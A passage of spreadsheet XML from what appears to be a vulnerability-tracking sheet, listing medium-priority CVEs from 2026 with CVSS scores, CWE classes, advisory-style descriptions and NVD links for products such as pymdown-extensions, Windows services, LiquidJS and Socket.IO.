      <c r="J2705" s="5" t="inlineStr"/>
      <c r="K2705" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2705" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="2706">
      <c r="A2706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67422</t>
        </is>
      </c>
      <c r="C2706" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2706" s="5" t="inlineStr"/>
      <c r="F2706" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2706" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2706" s="5" t="inlineStr"/>
      <c r="I2706" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2706" s="5" t="inlineStr"/>
      <c r="K2706" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L2706" s="5" t="inlineStr">
        <is>
          <t>pymdown-extensions is a collection of extensions for the Python Markdown library. In versions up to and including 11.0, four inline processors (caret, tilde, betterem, and magiclink) use regular expressions whose content groups can partition a run of delimiter characters in exponentially many ways, causing catastrophic backtracking. As a result, a single untrusted Markdown line under 50 bytes rendered with markdown.markdown() in each extension's default configuration drives the rendering thread into unbounded CPU usage that grows exponentially with input length, enabling an unauthenticated remote attacker who can submit Markdown to cause denial of service. The exposure is concrete for web applications that render user-supplied Markdown (comments, wikis, issue bodies, live preview), including any app using pymdownx.extra which bundles the vulnerable betterem default, as well as hosted docs/CI systems that build untrusted Markdown. The issue has been fixed in version 11.0.1.</t>
        </is>
      </c>
      <c r="M2706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67422</t>
        </is>
      </c>
    </row>
    <row r="2707">
      <c r="A2707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67865</t>
        </is>
      </c>
      <c r="C2707" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2707" s="5" t="inlineStr"/>
      <c r="F2707" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2707" s="5" t="inlineStr"/>
      <c r="H2707" s="5" t="inlineStr"/>
      <c r="I2707" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2707" s="5" t="inlineStr"/>
      <c r="K2707" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2707" s="5" t="inlineStr">
        <is>
          <t>S2OPC 1.7.3 contains an out-of-bounds read in RepublishResponse handling. This allows a remote attacker to cause a denial of service</t>
        </is>
      </c>
      <c r="M2707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67865</t>
        </is>
      </c>
    </row>
    <row r="2708">
      <c r="A2708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67918</t>
        </is>
      </c>
      <c r="C2708" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2708" s="5" t="inlineStr"/>
      <c r="F2708" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2708" s="5" t="inlineStr"/>
      <c r="H2708" s="5" t="inlineStr"/>
      <c r="I2708" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2708" s="5" t="inlineStr"/>
      <c r="K2708" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2708" s="5" t="inlineStr">
        <is>
          <t>Directory Traversal vulnerability in hermes-studio v.0.6.26 allows a remote attacker to obtain sensitive information via the validatePath function in api/hermes/download endpoint</t>
        </is>
      </c>
      <c r="M2708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67918</t>
        </is>
      </c>
    </row>
    <row r="2709">
      <c r="A2709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67977</t>
        </is>
      </c>
      <c r="C2709" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2709" s="5" t="inlineStr"/>
      <c r="F2709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2709" s="5" t="inlineStr"/>
      <c r="H2709" s="5" t="inlineStr"/>
      <c r="I2709" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2709" s="5" t="inlineStr"/>
      <c r="K2709" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2709" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the Svc::FileDownlink::SendPartial component of fprime framework v4.2.2 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67977</t>
        </is>
      </c>
    </row>
    <row r="2710">
      <c r="A2710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67991</t>
        </is>
      </c>
      <c r="C2710" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2710" s="5" t="inlineStr"/>
      <c r="F2710" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2710" s="5" t="inlineStr"/>
      <c r="H2710" s="5" t="inlineStr"/>
      <c r="I2710" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2710" s="5" t="inlineStr"/>
      <c r="K2710" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L2710" s="5" t="inlineStr">
        <is>
          <t>crmne/ruby_llm at commit fa6f279847d6d7027814539d9c0dfc3bbdfd2a83 contains a polynomial-time regular expression denial-of-service condition in RubyLLM::Utils.underscore on Ruby 3.1.x. A very long crafted class, agent, or tool name can cause excessive CPU consumption and a denial of service.</t>
        </is>
      </c>
      <c r="M2710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67991</t>
        </is>
      </c>
    </row>
    <row r="2711">
      <c r="A2711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68005</t>
        </is>
      </c>
      <c r="C2711" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2711" s="5" t="inlineStr"/>
      <c r="F2711" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2711" s="5" t="inlineStr"/>
      <c r="H2711" s="5" t="inlineStr"/>
      <c r="I2711" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2711" s="5" t="inlineStr"/>
      <c r="K2711" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2711" s="5" t="inlineStr">
        <is>
          <t>An issue in ACME mini_httpd 1.30 and prior allows a remote attacker to cause a denial of service via the HTTP request header parser in the handle_request() function</t>
        </is>
      </c>
      <c r="M2711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68005</t>
        </is>
      </c>
    </row>
    <row r="2712">
      <c r="A2712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68500</t>
        </is>
      </c>
      <c r="C2712" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2712" s="5" t="inlineStr"/>
      <c r="F2712" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2712" s="5" t="inlineStr"/>
      <c r="H2712" s="5" t="inlineStr"/>
      <c r="I2712" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J2712" s="5" t="inlineStr"/>
      <c r="K2712" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2712" s="5" t="inlineStr">
        <is>
          <t>Sylius Mollie Plugin provides Mollie payment integration for Sylius applications. Prior to 2.2.8, 3.2.4, and 3.3.1, Sylius Mollie Plugin's POST /{_locale}/update-payment payment webhook accepts attacker-controlled id and orderId parameters but does not verify that the Mollie payment belongs to the referenced Sylius order, allowing an unauthenticated attacker with any valid paid Mollie payment ID to mark a victim order as paid without transferring funds for that order. This issue is fixed in 2.2.8, 3.2.4, and 3.3.1.</t>
        </is>
      </c>
      <c r="M2712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68500</t>
        </is>
      </c>
    </row>
    <row r="2713">
      <c r="A2713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6857</t>
        </is>
      </c>
      <c r="C2713" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2713" s="5" t="inlineStr"/>
      <c r="F2713" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2713" s="5" t="inlineStr"/>
      <c r="H2713" s="5" t="inlineStr"/>
      <c r="I2713" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J2713" s="5" t="inlineStr"/>
      <c r="K2713" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2713" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in camel-infinispan. This vulnerability involves unsafe deserialization in the ProtoStream remote aggregation repository. A remote attacker with low privileges could exploit this by sending specially crafted data, leading to arbitrary code execution. This allows the attacker to gain full control over the affected system, impacting its confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="M2713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6857</t>
        </is>
      </c>
    </row>
    <row r="2714">
      <c r="A2714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68887</t>
        </is>
      </c>
      <c r="C2714" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2714" s="5" t="inlineStr"/>
      <c r="F2714" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2714" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2714" s="5" t="inlineStr"/>
      <c r="I2714" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2714" s="5" t="inlineStr"/>
      <c r="K2714" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2714" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t>
        </is>
      </c>
    </row>
    <row r="2715">
      <c r="A2715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6893</t>
        </is>
      </c>
      <c r="C2715" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2715" s="5" t="inlineStr"/>
      <c r="F2715" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G2715" s="5" t="inlineStr"/>
      <c r="H2715" s="5" t="inlineStr"/>
      <c r="I2715" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J2715" s="5" t="inlineStr"/>
      <c r="K2715" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2715" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in dracut. A remote attacker on the adjacent network can exploit this vulnerability by providing specially crafted DHCP (Dynamic Host Configuration Protocol) options, such as a malicious hostname, to a system using dracut's legacy DHCP path. These options are improperly handled and written into temporary shell scripts without proper escaping, leading to command injection. This allows the attacker to achieve root code execution within the initramfs, potentially compromising the system's boot and network behavior.</t>
        </is>
      </c>
      <c r="M2715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6893</t>
        </is>
      </c>
    </row>
    <row r="2716">
      <c r="A2716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69185</t>
        </is>
      </c>
      <c r="C2716" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2716" s="5" t="inlineStr"/>
      <c r="F2716" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2716" s="5" t="inlineStr"/>
      <c r="H2716" s="5" t="inlineStr"/>
      <c r="I2716" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2716" s="5" t="inlineStr"/>
      <c r="K2716" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-754</t>
        </is>
      </c>
      <c r="L2716" s="5" t="inlineStr">
        <is>
          <t>Socket.IO enables bidirectional and low-latency communication for every platform. Prior to 4.2.7, 3.4.5, and 3.3.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This vulnerability is fixed in 4.2.7, 3.4.5, and 3.3.6.</t>
        </is>
      </c>
      <c r="M2716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69185</t>
        </is>
      </c>
    </row>
    <row r="2717">
      <c r="A2717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69222</t>
        </is>
      </c>
      <c r="C2717" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2717" s="5" t="inlineStr"/>
      <c r="F2717" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2717" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2717" s="5" t="inlineStr"/>
      <c r="I2717" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2717" s="5" t="inlineStr"/>
      <c r="K2717" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2717" s="5" t="inlineStr">
        <is>
          <t>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.27.2, the join filter in src/filters/array.ts computes complexity from array.length and separator length instead of the total string length produced by array.join(sep). The concat filter can cheaply double arrays of references, after which join materializes the referenced content while charging only for element count, allowing a template to exceed a configured memoryLimit by a large factor. The sibling array_to_sentence_string filter in src/filters/string.ts has the same accounting defect, and a crafted template can allocate toward V8's string or process memory limit and crash the process. This issue is fixed in version 10.27.2.</t>
        </is>
      </c>
      <c r="M2717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t>
        </is>
      </c>
    </row>
    <row r="2718">
      <c r="A2718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69329</t>
        </is>
      </c>
      <c r="C2718" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2718" s="5" t="inlineStr"/>
      <c r="F2718" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2718" s="5" t="inlineStr"/>
      <c r="H2718" s="5" t="inlineStr"/>
      <c r="I2718" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2718" s="5" t="inlineStr"/>
      <c r="K2718" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L2718" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t>
        </is>
      </c>
    </row>
    <row r="2719">
      <c r="A2719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="C2719" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2719" s="5" t="inlineStr"/>
      <c r="F2719" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2719" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2719" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2719" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2719" s="5" t="inlineStr"/>
      <c r="K2719" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2719" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="2720">
      <c r="A2720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69378</t>
        </is>
      </c>
      <c r="C2720" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2720" s="5" t="inlineStr"/>
      <c r="F2720" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2720" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2720" s="5" t="inlineStr"/>
      <c r="I2720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2720" s="5" t="inlineStr"/>
      <c r="K2720" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2720" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t>
        </is>
      </c>
    </row>
    <row r="2721">
      <c r="A2721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="C2721" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2721" s="5" t="inlineStr"/>
      <c r="F2721" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2721" s="5" t="inlineStr">
        <is>
          <t>windows, openssh</t>
        </is>
      </c>
      <c r="H2721" s="5" t="inlineStr"/>
      <c r="I2721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2721" s="5" t="inlineStr"/>
      <c r="K2721" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2721" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="2722">
      <c r="A2722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69428</t>
        </is>
      </c>
      <c r="C2722" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2722" s="5" t="inlineStr"/>
      <c r="F2722" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2722" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2722" s="5" t="inlineStr"/>
      <c r="I2722" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2722" s="5" t="inlineStr"/>
      <c r="K2722" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2722" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t>
        </is>
      </c>
    </row>
    <row r="2723">
      <c r="A2723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69429</t>
        </is>
      </c>
      <c r="C2723" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2723" s="5" t="inlineStr"/>
      <c r="F2723" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2723" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2723" s="5" t="inlineStr"/>
      <c r="I2723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2723" s="5" t="inlineStr"/>
      <c r="K2723" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2723" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t>
        </is>
      </c>
    </row>
    <row r="2724">
      <c r="A2724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69443</t>
        </is>
      </c>
      <c r="C2724" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2724" s="5" t="inlineStr"/>
      <c r="F2724" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2724" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2724" s="5" t="inlineStr"/>
      <c r="I2724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2724" s="5" t="inlineStr"/>
      <c r="K2724" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2724" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t>
        </is>
      </c>
    </row>
    <row r="2725">
      <c r="A2725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="C2725" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2725" s="5" t="inlineStr"/>
      <c r="F2725" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2725" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2725" s="5" t="inlineStr"/>
      <c r="I2725" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2725" s="5" t="inlineStr"/>
      <c r="K2725" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2725" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="2726">
      <c r="A2726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="C2726" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2726" s="5" t="inlineStr"/>
      <c r="F2726" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2726" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2726" s="5" t="inlineStr"/>
      <c r="I2726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2726" s="5" t="inlineStr"/>
      <c r="K2726" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2726" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="2727">
      <c r="A2727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69587</t>
        </is>
      </c>
      <c r="C2727" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2727" s="5" t="inlineStr"/>
      <c r="F2727" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2727" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2727" s="5" t="inlineStr"/>
      <c r="I2727" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2727" s="5" t="inlineStr"/>
      <c r="K2727" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2727" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t>
        </is>
      </c>
    </row>
    <row r="2728">
      <c r="A2728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69588</t>
        </is>
      </c>
      <c r="C2728" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2728" s="5" t="inlineStr"/>
      <c r="F2728" s="5" t="n">
